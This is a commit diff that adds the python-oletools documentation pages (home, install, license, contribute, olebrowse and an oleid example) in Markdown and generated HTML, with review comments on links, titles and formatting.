Commit 1d0ddff7591940aea11ef25dde6da725121c3262

Authored by Philippe Lagadec
1 parent bf7146ba

added doc subfolder, generated from wiki.

oletools/doc/Contribute.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="how-to-suggest-improvements-report-issues-or-contribute">How to Suggest Improvements, Report Issues or Contribute</h1>
  11 +<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
  12 +<p>To <strong>suggest improvements, report a bug or any issue</strong>, please use the <a href="https://bitbucket.org/decalage/olefileio_pl/issues?status=new&amp;status=open">issue reporting page</a>, providing all the information and files to reproduce the problem.</p>
  13 +<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to <strong>provide feedback</strong>.</p>
  14 +<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>. You may use it to <strong>submit enhancements</strong> using forks and pull requests.</p>
  15 +<hr />
  16 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  17 +<ul>
  18 +<li><a href="Home.html">Home</a></li>
  19 +<li><a href="License.html">License</a></li>
  20 +<li><a href="Install.html">Install</a></li>
  21 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  22 +<li>Tools:
  23 +<ul>
  24 +<li><a href="olebrowse.html">olebrowse</a></li>
  25 +<li><a href="oleid.html">oleid</a></li>
  26 +<li><a href="olemeta.html">olemeta</a></li>
  27 +<li><a href="oletimes.html">oletimes</a></li>
  28 +<li><a href="olevba.html">olevba</a></li>
  29 +<li><a href="pyxswf.html">pyxswf</a></li>
  30 +<li><a href="rtfobj.html">rtfobj</a></li>
  31 +</ul></li>
  32 +</ul>
  33 +</body>
  34 +</html>
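Review bot: the issue-tracker link on line 12 points to `https://bitbucket.org/decalage/olefileio_pl/issues`, while Home.html in this same commit sends readers to `https://bitbucket.org/decalage/oletools/issues` for the same purpose. If oletools reports are meant to land in the oletools tracker, change the link here and in Contribute.md, which carries the same URL. On line 11, "on my spare time" should read "in my spare time".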
... ...
oletools/doc/Contribute.md 0 → 100644
  1 +How to Suggest Improvements, Report Issues or Contribute
  2 +========================================================
  3 +
  4 +This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
  5 +
  6 +To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem.
  7 +
  8 +You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**.
  9 +
  10 +The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/oletools). You may use it to **submit enhancements** using forks and pull requests.
  11 +
  12 +--------------------------------------------------------------------------
  13 +
  14 +python-oletools documentation
  15 +-----------------------------
  16 +
  17 +- [[Home]]
  18 +- [[License]]
  19 +- [[Install]]
  20 +- [[Contribute]], Suggest Improvements or Report Issues
  21 +- Tools:
  22 + - [[olebrowse]]
  23 + - [[oleid]]
  24 + - [[olemeta]]
  25 + - [[oletimes]]
  26 + - [[olevba]]
  27 + - [[pyxswf]]
  28 + - [[rtfobj]]
0 29 \ No newline at end of file
... ...
oletools/doc/Home.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="python-oletools-v0.06-documentation">python-oletools v0.06 documentation</h1>
  11 +<p>This is the home page of the documentation for python-oletools. The latest version can be found <a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
  12 +<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze <a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)</a>, such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the <a href="http://www.decalage.info/python/olefileio">OleFileIO_PL</a> parser. See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
  13 +<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> - <a href="https://bitbucket.org/decalage/oletools/downloads">Download</a> - <a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> - <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> - <a href="http://decalage.info/contact">Contact the author</a> - <a href="https://bitbucket.org/decalage/oletools">Repository</a> - <a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
  14 +<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
  15 +<h2 id="tools-in-python-oletools">Tools in python-oletools:</h2>
  16 +<ul>
  17 +<li><strong><a href="olebrowse.html">olebrowse</a></strong>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</li>
  18 +<li><strong><a href="oleid.html">oleid</a></strong>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</li>
  19 +<li><strong><a href="olemeta.html">olemeta</a></strong>: a tool to extract all standard properties (metadata) from OLE files.</li>
  20 +<li><strong><a href="oletimes.html">oletimes</a></strong>: a tool to extract creation and modification timestamps of all streams and storages.</li>
  21 +<li><strong><a href="olevba.html">olevba</a></strong>: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).</li>
  22 +<li><strong><a href="pyxswf.html">pyxswf</a></strong>: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.</li>
  23 +<li><strong><a href="rtfobj.html">rtfobj</a></strong>: a tool and python module to extract embedded objects from RTF files.</li>
  24 +<li>and a few others (coming soon)</li>
  25 +</ul>
  26 +<hr />
  27 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  28 +<ul>
  29 +<li><a href="Home.html">Home</a></li>
  30 +<li><a href="License.html">License</a></li>
  31 +<li><a href="Install.html">Install</a></li>
  32 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  33 +<li>Tools:
  34 +<ul>
  35 +<li><a href="olebrowse.html">olebrowse</a></li>
  36 +<li><a href="oleid.html">oleid</a></li>
  37 +<li><a href="olemeta.html">olemeta</a></li>
  38 +<li><a href="oletimes.html">oletimes</a></li>
  39 +<li><a href="olevba.html">olevba</a></li>
  40 +<li><a href="pyxswf.html">pyxswf</a></li>
  41 +<li><a href="rtfobj.html">rtfobj</a></li>
  42 +</ul></li>
  43 +</ul>
  44 +</body>
  45 +</html>
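Review bot: `<title></title>` on line 7 is empty, so the page is untitled in browser tabs, history and bookmarks, and the same holds for every generated .html file in this commit. Set a title when converting from the wiki source (the text already used for the `<h1>` would do). It is also worth deciding whether the generated HTML should be versioned next to the .md files it is built from, since the two copies can drift apart.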
... ...
oletools/doc/Home.md 0 → 100644
  1 +python-oletools v0.06 documentation
  2 +===================================
  3 +
  4 +This is the home page of the documentation for python-oletools. The latest version can be found [online](https://bitbucket.org/decalage/oletools/wiki), otherwise a copy is provided in the doc subfolder of the package.
  5 +
  6 +[python-oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the [OleFileIO_PL](http://www.decalage.info/python/olefileio) parser. See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/oletools) for more info.
  7 +
  8 +**Quick links:** [Home page](http://www.decalage.info/python/oletools) - [Download](https://bitbucket.org/decalage/oletools/downloads) - [Documentation](https://bitbucket.org/decalage/oletools/wiki) - [Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/oletools/issues?status=new&status=open) - [Contact the author](http://decalage.info/contact) - [Repository](https://bitbucket.org/decalage/oletools) - [Updates on Twitter](https://twitter.com/decalage2)
  9 +
  10 +Note: python-oletools is not related to OLETools published by BeCubed Software.
  11 +
  12 +Tools in python-oletools:
  13 +-------------------------
  14 +
  15 +- **[[olebrowse]]**: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
  16 + view and extract individual data streams.
  17 +- **[[oleid]]**: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
  18 +- **[[olemeta]]**: a tool to extract all standard properties (metadata) from OLE files.
  19 +- **[[oletimes]]**: a tool to extract creation and modification timestamps of all streams and storages.
  20 +- **[[olevba]]**: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).
  21 +- **[[pyxswf]]**: a tool to detect, extract and analyze Flash objects (SWF) that may
  22 + be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,
  23 + which is especially useful for malware analysis.
  24 +- **[[rtfobj]]**: a tool and python module to extract embedded objects from RTF files.
  25 +- and a few others (coming soon)
  26 +
  27 +--------------------------------------------------------------------------
  28 +
  29 +python-oletools documentation
  30 +-----------------------------
  31 +
  32 +- [[Home]]
  33 +- [[License]]
  34 +- [[Install]]
  35 +- [[Contribute]], Suggest Improvements or Report Issues
  36 +- Tools:
  37 + - [[olebrowse]]
  38 + - [[oleid]]
  39 + - [[olemeta]]
  40 + - [[oletimes]]
  41 + - [[olevba]]
  42 + - [[pyxswf]]
  43 + - [[rtfobj]]
0 44 \ No newline at end of file
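Review bot: the `[[olebrowse]]`, `[[Home]]` and similar links (lines 15-24 and 32-43) are wiki-link syntax, so in the copy shipped in the doc subfolder they will show as literal double brackets in any Markdown viewer that is not the wiki. The generated Home.html already uses `<a href="olebrowse.html">`; the .md copy could use ordinary relative links such as `[olebrowse](olebrowse.md)`, or the text on line 4 could say that the .md files are wiki source and the .html files are the ones to read offline. The file also lacks a trailing newline.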
... ...
oletools/doc/Install.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="how-to-download-and-install-python-oletools">How to Download and Install python-oletools</h1>
  11 +<h2 id="pre-requisites">Pre-requisites</h2>
  12 +<p>For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.</p>
  13 +<h2 id="for-command-line-tools">For command-line tools</h2>
  14 +<p>To use python-oletools from the command line as analysis tools, you may simply <a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a> and extract the files in the directory of your choice.</p>
  15 +<p>You may then add the directory to your PATH environment variable to access the tools from anywhere.</p>
  16 +<h2 id="for-python-applications">For python applications</h2>
  17 +<p>If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use &quot;<strong>pip install oletools</strong>&quot; or &quot;<strong>easy_install oletools</strong>&quot; to download and install the package in one go.</p>
  18 +<p>Otherwise you may download/extract the <a href="https://bitbucket.org/decalage/oletools/downloads">zip archive</a> in a temporary directory and run &quot;<strong>python setup.py install</strong>&quot;.</p>
  19 +<hr />
  20 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  21 +<ul>
  22 +<li><a href="Home.html">Home</a></li>
  23 +<li><a href="License.html">License</a></li>
  24 +<li><a href="Install.html">Install</a></li>
  25 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  26 +<li>Tools:
  27 +<ul>
  28 +<li><a href="olebrowse.html">olebrowse</a></li>
  29 +<li><a href="oleid.html">oleid</a></li>
  30 +<li><a href="olemeta.html">olemeta</a></li>
  31 +<li><a href="oletimes.html">oletimes</a></li>
  32 +<li><a href="olevba.html">olevba</a></li>
  33 +<li><a href="pyxswf.html">pyxswf</a></li>
  34 +<li><a href="rtfobj.html">rtfobj</a></li>
  35 +</ul></li>
  36 +</ul>
  37 +</body>
  38 +</html>
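Review bot: wording on line 12, "python-oletools require Python 2.x. They are not compatible" mixes singular and plural for the package name; "python-oletools requires Python 2.x. It is not compatible with Python 3.x yet." reads better. Fix it in the wiki source so that Install.md and this generated file stay in step.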
... ...
oletools/doc/Install.md 0 → 100644
  1 +How to Download and Install python-oletools
  2 +===========================================
  3 +
  4 +Pre-requisites
  5 +--------------
  6 +
  7 +For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.
  8 +
  9 +
  10 +For command-line tools
  11 +----------------------
  12 +
  13 +To use python-oletools from the command line as analysis tools, you may simply [download the zip archive](https://bitbucket.org/decalage/oletools/downloads) and extract the files in the directory of your choice.
  14 +
  15 +You may then add the directory to your PATH environment variable to access the tools from anywhere.
  16 +
  17 +For python applications
  18 +----------------------
  19 +
  20 +If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "**pip install oletools**" or "**easy_install oletools**" to download and install the package in one go.
  21 +
  22 +Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/oletools/downloads) in a temporary directory and run "**python setup.py install**".
  23 +
  24 +--------------------------------------------------------------------------
  25 +
  26 +python-oletools documentation
  27 +-----------------------------
  28 +
  29 +- [[Home]]
  30 +- [[License]]
  31 +- [[Install]]
  32 +- [[Contribute]], Suggest Improvements or Report Issues
  33 +- Tools:
  34 + - [[olebrowse]]
  35 + - [[oleid]]
  36 + - [[olemeta]]
  37 + - [[oletimes]]
  38 + - [[olevba]]
  39 + - [[pyxswf]]
  40 + - [[rtfobj]]
0 41 \ No newline at end of file
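Review bot: neither install path (the zip download on line 13, or pip/easy_install and `python setup.py install` on lines 20-22) tells the reader how to check what was downloaded. For a package that is meant to run on workstations used for malware analysis, consider naming the current release and giving a checksum for the zip archive next to the download link, so the archive can be verified before it is extracted or installed.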
... ...
oletools/doc/License.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="license-for-python-oletools">License for python-oletools</h1>
  11 +<p>This license applies to the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package, apart from the thirdparty folder which contains third-party files published with their own license.</p>
  12 +<p>The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec (<a href="http://www.decalage.info">http://www.decalage.info</a>)</p>
  13 +<p>All rights reserved.</p>
  14 +<p>Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</p>
  15 +<ul>
  16 +<li>Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</li>
  17 +<li>Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</li>
  18 +</ul>
  19 +<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
  20 +<table>
  21 +<tbody>
  22 +<tr class="odd">
  23 +<td align="left">License for officeparser</td>
  24 +</tr>
  25 +</tbody>
  26 +</table>
  27 +<p>olevba contains modified source code from the <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> project, published under the following MIT License (MIT):</p>
  28 +<p>officeparser is copyright (c) 2014 John William Davison</p>
  29 +<p>Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the &quot;Software&quot;), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:</p>
  30 +<p>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</p>
  31 +<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</p>
  32 +<hr />
  33 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  34 +<ul>
  35 +<li><a href="Home.html">Home</a></li>
  36 +<li><a href="License.html">License</a></li>
  37 +<li><a href="Install.html">Install</a></li>
  38 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  39 +<li>Tools:
  40 +<ul>
  41 +<li><a href="olebrowse.html">olebrowse</a></li>
  42 +<li><a href="oleid.html">oleid</a></li>
  43 +<li><a href="olemeta.html">olemeta</a></li>
  44 +<li><a href="oletimes.html">oletimes</a></li>
  45 +<li><a href="olevba.html">olevba</a></li>
  46 +<li><a href="pyxswf.html">pyxswf</a></li>
  47 +<li><a href="rtfobj.html">rtfobj</a></li>
  48 +</ul></li>
  49 +</ul>
  50 +</body>
  51 +</html>
... ...
oletools/doc/License.md 0 → 100644
  1 +License for python-oletools
  2 +===========================
  3 +
  4 +This license applies to the [python-oletools](http://www.decalage.info/python/oletools) package, apart from the thirdparty folder which contains third-party files published with their own license.
  5 +
  6 +The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info))
  7 +
  8 +All rights reserved.
  9 +
  10 +Redistribution and use in source and binary forms, with or without modification,
  11 +are permitted provided that the following conditions are met:
  12 +
  13 + * Redistributions of source code must retain the above copyright notice, this
  14 + list of conditions and the following disclaimer.
  15 + * Redistributions in binary form must reproduce the above copyright notice,
  16 + this list of conditions and the following disclaimer in the documentation
  17 + and/or other materials provided with the distribution.
  18 +
  19 +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
  20 +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  21 +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  22 +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  23 +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  24 +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  25 +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  26 +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  27 +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  28 +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  29 +
  30 +
  31 +----------
  32 +License for officeparser
  33 +------------------------
  34 +
  35 +olevba contains modified source code from the [officeparser](https://github.com/unixfreak0037/officeparser) project, published
  36 +under the following MIT License (MIT):
  37 +
  38 +officeparser is copyright (c) 2014 John William Davison
  39 +
  40 +Permission is hereby granted, free of charge, to any person obtaining a copy
  41 +of this software and associated documentation files (the "Software"), to deal
  42 +in the Software without restriction, including without limitation the rights
  43 +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  44 +copies of the Software, and to permit persons to whom the Software is
  45 +furnished to do so, subject to the following conditions:
  46 +
  47 +The above copyright notice and this permission notice shall be included in all
  48 +copies or substantial portions of the Software.
  49 +
  50 +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  51 +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  52 +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  53 +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  54 +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  55 +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  56 +SOFTWARE.
  57 +
  58 +--------------------------------------------------------------------------
  59 +
  60 +python-oletools documentation
  61 +-----------------------------
  62 +
  63 +- [[Home]]
  64 +- [[License]]
  65 +- [[Install]]
  66 +- [[Contribute]], Suggest Improvements or Report Issues
  67 +- Tools:
  68 + - [[olebrowse]]
  69 + - [[oleid]]
  70 + - [[olemeta]]
  71 + - [[oletimes]]
  72 + - [[olevba]]
  73 + - [[pyxswf]]
  74 + - [[rtfobj]]
0 75 \ No newline at end of file
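Review bot: the `----------` rule on line 31 is followed directly by the "License for officeparser" heading and its underline (lines 32-33) with no blank line between them, and the HTML conversion has read the three lines as a one-cell table: License.html in this commit contains `<table>` with `<td align="left">License for officeparser</td>` where an `<h2>` was intended. Add a blank line after line 31 (or drop the rule) and regenerate License.html.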
... ...
oletools/doc/olebrowse.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olebrowse">olebrowse</h1>
  11 +<p>olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>olebrowse.py [file]</code></pre>
  15 +<p>If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.</p>
  16 +<h2 id="screenshots">Screenshots</h2>
  17 +<p>Main menu, showing all streams in the OLE file:</p>
  18 +<div class="figure">
  19 +<img src="olebrowse1_menu.png" /><p class="caption"></p>
  20 +</div>
  21 +<p>Menu with actions for a stream:</p>
  22 +<div class="figure">
  23 +<img src="olebrowse2_stream.png" /><p class="caption"></p>
  24 +</div>
  25 +<p>Hex view for a stream:</p>
  26 +<div class="figure">
  27 +<img src="olebrowse3_hexview.png" /><p class="caption"></p>
  28 +</div>
  29 +<hr />
  30 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  31 +<ul>
  32 +<li><a href="Home.html">Home</a></li>
  33 +<li><a href="License.html">License</a></li>
  34 +<li><a href="Install.html">Install</a></li>
  35 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  36 +<li>Tools:
  37 +<ul>
  38 +<li><a href="olebrowse.html">olebrowse</a></li>
  39 +<li><a href="oleid.html">oleid</a></li>
  40 +<li><a href="olemeta.html">olemeta</a></li>
  41 +<li><a href="oletimes.html">oletimes</a></li>
  42 +<li><a href="olevba.html">olevba</a></li>
  43 +<li><a href="pyxswf.html">pyxswf</a></li>
  44 +<li><a href="rtfobj.html">rtfobj</a></li>
  45 +</ul></li>
  46 +</ul>
  47 +</body>
  48 +</html>
... ...
oletools/doc/olebrowse.md 0 → 100644
  1 +olebrowse
  2 +=========
  3 +
  4 +olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
  5 +view and extract individual data streams.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +Usage
  10 +-----
  11 +
  12 + olebrowse.py [file]
  13 +
  14 +If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
  15 +
  16 +Screenshots
  17 +-----------
  18 +
  19 +Main menu, showing all streams in the OLE file:
  20 +
  21 +![](olebrowse1_menu.png)
  22 +
  23 +Menu with actions for a stream:
  24 +
  25 +![](olebrowse2_stream.png)
  26 +
  27 +Hex view for a stream:
  28 +
  29 +![](olebrowse3_hexview.png)
  30 +
  31 +--------------------------------------------------------------------------
  32 +
  33 +python-oletools documentation
  34 +-----------------------------
  35 +
  36 +- [[Home]]
  37 +- [[License]]
  38 +- [[Install]]
  39 +- [[Contribute]], Suggest Improvements or Report Issues
  40 +- Tools:
  41 + - [[olebrowse]]
  42 + - [[oleid]]
  43 + - [[olemeta]]
  44 + - [[oletimes]]
  45 + - [[olevba]]
  46 + - [[pyxswf]]
  47 + - [[rtfobj]]
0 48 \ No newline at end of file
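Review bot: the three screenshots on lines 21, 25 and 29 use `![](...)` with empty alt text, and the generated olebrowse.html accordingly has `<img>` tags with no `alt` attribute and empty captions. Reuse the sentence above each image as its alt text, for example `![Main menu, showing all streams in the OLE file](olebrowse1_menu.png)`, so the page still makes sense when the PNG files are missing or not rendered.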
... ...
oletools/doc/olebrowse1_menu.png 0 → 100644

38.1 KB

oletools/doc/olebrowse2_stream.png 0 → 100644

29.1 KB

oletools/doc/olebrowse3_hexview.png 0 → 100644

39.2 KB

oletools/doc/oleid.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="oleid">oleid</h1>
  11 +<p>oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="main-features">Main Features</h2>
  14 +<ul>
  15 +<li>Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)</li>
  16 +<li>Detect VBA Macros</li>
  17 +<li>Detect embedded Flash objects</li>
  18 +<li>Detect embedded OLE objects</li>
  19 +<li>Detect MS Office encryption</li>
  20 +<li>Can be used as a command-line tool</li>
  21 +<li>Python API to integrate it in your applications</li>
  22 +</ul>
  23 +<p>Planned improvements:</p>
  24 +<ul>
  25 +<li>Extract the most important metadata fields</li>
  26 +<li>Support for OpenXML files and embedded OLE files</li>
  27 +<li>Generic VBA macros detection</li>
  28 +<li>Detect auto-executable VBA macros</li>
  29 +<li>Extended OLE file types detection</li>
  30 +<li>Detect unusual OLE structures (fragmentation, unused sectors, etc)</li>
  31 +<li>Options to scan multiple files</li>
  32 +<li>Options to scan files from encrypted zip archives</li>
  33 +<li>CSV output</li>
  34 +</ul>
  35 +<h2 id="usage">Usage</h2>
  36 +<pre><code>oleid.py &lt;file&gt;</code></pre>
  37 +<h3 id="example">Example</h3>
  38 +<p>Analyzing a Word document containing a Flash object and VBA macros:</p>
  39 +<pre><code>C:\oletools&gt;oleid.py word_flash_vba.doc
  40 +
  41 +Filename: word_flash_vba.doc
  42 +OLE format: True
  43 +Has SummaryInformation stream: True
  44 +Application name: Microsoft Office Word
  45 +Encrypted: False
  46 +Word Document: True
  47 +VBA Macros: True
  48 +Excel Workbook: False
  49 +PowerPoint Presentation: False
  50 +Visio Drawing: False
  51 +ObjectPool: True
